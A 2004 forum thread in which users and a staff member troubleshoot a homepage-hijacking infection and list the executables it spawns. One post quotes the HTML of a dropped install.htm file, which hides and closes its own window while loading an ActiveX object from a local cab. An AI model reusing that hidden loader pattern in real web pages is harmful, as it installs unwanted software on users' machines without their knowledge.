Similar to the mshp.dll problem below, i am getting a bzxlc.dll homepage

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by Andy R, Jun 14, 2004.

  1. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    One more item to try that could help us find this piece of crap: Security Task Manager. Download it from http://www.neuber.com/taskmanager/download.html Check it out. Maybe we can find some process running that is suspicious. This is 30 day trial software use it quickly.
     
  3. Andy R

    Andy R Private E-2

    it looks like the sysqz32.exe is spawning a lot of executables when the changeover occurs. Also a new MSMSGS.EXE messenger pops up during these times, i'm not sure what that is doing.

    I noticed these pop up:

    mfcl032.exe
    mshg32.exe
    apitr32.exe
    appwd32.exe
    msdj32.exe
    mfcjp32.exe

    Here are the links to 4 snapshots of the reg monitor of various points. I don't want a direct picture since there so big and take up the whole page.


    http://www.public.iastate.edu/~ajross/Sc01.JPG
    http://www.public.iastate.edu/~ajross/Sc02.JPG

    http://www.public.iastate.edu/~ajross/Sc03.JPG

    http://www.public.iastate.edu/~ajross/Sc04.JPG
     
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Andy,

    Search your PC for each one of the EXE files and let's try renaming them to something non executable (like mfcl032.exe ---> mfcl032exe.bad) Can you disable Messenger?

    By the way, I could not download the images at first until I realized you put a comma after www instead of a period. It's getting late. Eye's are growing weary.
     
  5. Andy R

    Andy R Private E-2

    Ok, i tried it again, watching the process explorer, when i run hijack, i delete all entries, including the sysqz32.exe. When i open IE and search around, close, reopen. After a while a popup comes. Soon after that, as MSMSGS.exe messenger opens under the SVCHOST.EXE and then closes. Once that IE window is closed and reopened, its been changed. Although i remove the reg entry for sysqz32.exe, it is still a running process. So i don't konw if that still has anything to do with it. With this last test, i did not see anything being called by the sysqz32.exe. But watching process explorer, every once in a while, a new MSMSGS.EXE opens up then closes quickly. Watching closely, it looks like when a new messenger opens, it then closes the old one. So it keeps refreshing the messenger with a new copy!?
     
  6. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Maybe we need to rename MSMSGS.EXE so that it cannot run?
     
  7. Andy R

    Andy R Private E-2

    i tried to disable it through control panel -> Admin Tools -> Services ...

    I changed to disable, but when i did the hijack and IE test again, it still opened up.

    I will go safemode and change the messenger file
     
  8. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Okay! I gotta get some sleep now. Also check out the other file I said to download (Security Task Manager) it looks very useful too.

    Talk to ya later.

    Chas
     
  9. charco

    charco Private E-2

    only the best popup problem - i have noticed a couple of things:
    1. There is a file in the C: directory root called install.htm which contains some strange code (see below)

    the html code
    HTML>
    <HEAD>
    <TITLE>Express</TITLE>
    <SCRIPT language="Javascript">
    self.blur();
    self.resizeTo(10,10);
    self.moveTo(10,10);
    </SCRIPT>
    </HEAD>
    <BODY onLoad="self.close()" onFocus="self.blur()">
    <OBJECT classid="clsid:1C78AB3F-A857-482e-80C0-3A1E5238A565" codebase="C:\install.cab" id="toolbar" height=0 width=0>
    <PARAM name="userId" value="00015">
    </OBJECT>
    </BODY>
    </HTML>

    2. the browsers always seem to point to sp.html in a temporary directory. I opened this up using dreamweaver and changed it to google homepage. Then I saved it into the same place overwriting the original (malware) and set it to read only. Since then I have had no popups (yet!)

    this does not address the underlying problem but represents a quick fix
     
  10. samLouie

    samLouie Private E-2

    Why do Dll's come back....is it because you havent deleted all of them?
     
  11. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Yes! There are multiple DLLs and some are hidden and hard to find. Also there are other hidden processes (EXEs) running too which can respawn new DLLs and new processes. There other programs that run too java scripts, html, etc that can also cause the items to come back. You have to find everything that they have put on to your PC and get rid of it or disable it some how. Not to easy when processes are hidden and keep changing (mutating) on the fly. They also do not stay in one directory. The run from many different locations. Sometimes simultaneously.
     

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds